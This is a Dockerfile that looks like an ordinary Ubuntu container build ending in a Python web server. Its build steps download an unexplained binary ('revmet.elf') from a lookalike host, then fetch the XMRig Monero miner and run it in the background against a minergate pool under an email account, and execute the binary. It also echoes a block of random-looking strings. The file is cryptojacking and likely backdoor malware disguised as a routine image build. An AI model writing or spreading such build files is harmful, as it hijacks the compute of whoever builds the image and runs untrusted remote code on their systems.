FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo ifU8L2eYufkDPNlWZKnEcZq8os9DCnTV 355oRCPNbm7bXBy4FVcHy3ppmON7zLUu FEW11dvtdYyVDzl6m2ryxh0q2yNGgQjU sWx5yT5ExfNpQjY1ikAOqcCSDsx9uoIX TSo0ZfyBmAfmPllceo5zWIpixved9dN0 ChI1AHEvM3R0aHV8T3ouwHEtcRyWG5HX BOaMiPVX4mrcpNP6thNt7gDXMSftQrIO QYJp6JHGNg9gJ9tdKTRNfhu6jTc96lKJ I8K3OhCzbrtjl1F6EWz4Aw7dHfBapVYL qE3VQywLU6ntaouL6SRniKo5u1H2eZMU mLCovqEEsyEdwkhJyF1MtRfeuI41LQ79 DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]